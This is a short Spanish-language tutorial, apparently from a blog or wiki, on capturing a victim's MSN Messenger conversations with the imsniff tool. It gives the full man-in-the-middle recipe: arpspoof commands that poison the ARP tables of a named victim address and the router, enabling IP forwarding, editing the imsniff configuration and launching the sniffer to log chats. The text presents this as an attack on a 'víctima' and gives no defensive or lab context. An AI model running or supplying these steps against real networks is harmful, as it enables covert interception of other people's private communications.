imsniff
Capturar paquetes relacionados con el protocolo MSN . Su uso pasa por el envenenamiento arp, situando nuestra máquina entre la victima y el router lanzando en varias terminales y sin cerrarlas:
# arpspoof -i eth0 -t 192.168.1.15 192.168.1.1
# arpspoof -i eth0 -t 192.168.1.1 192.168.1.15
Activar forwarding para que los paquetes vayan a su verdadero dueño:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Crear una carpeta donde guardar los datos:
$ mkdir snifadas
Modificar el archivo de configuración a partir de la propia documentación ::
# cp /usr/share/doc/imsniff/examples/imsniff.conf.sample /etc/imsniff.conf
# nano /etc/imsniff.conf
daemonize = 0
promisc = 0
verbose = 2
chatdir = /home/USER/snifadas/chats
debugdir = /home/USER/snifadas/debug
interface eth0
Los directorios "chats" y "debug" los crea la misma aplicación.
Lanzar el sniffer de conversaciones msn:
# imsniff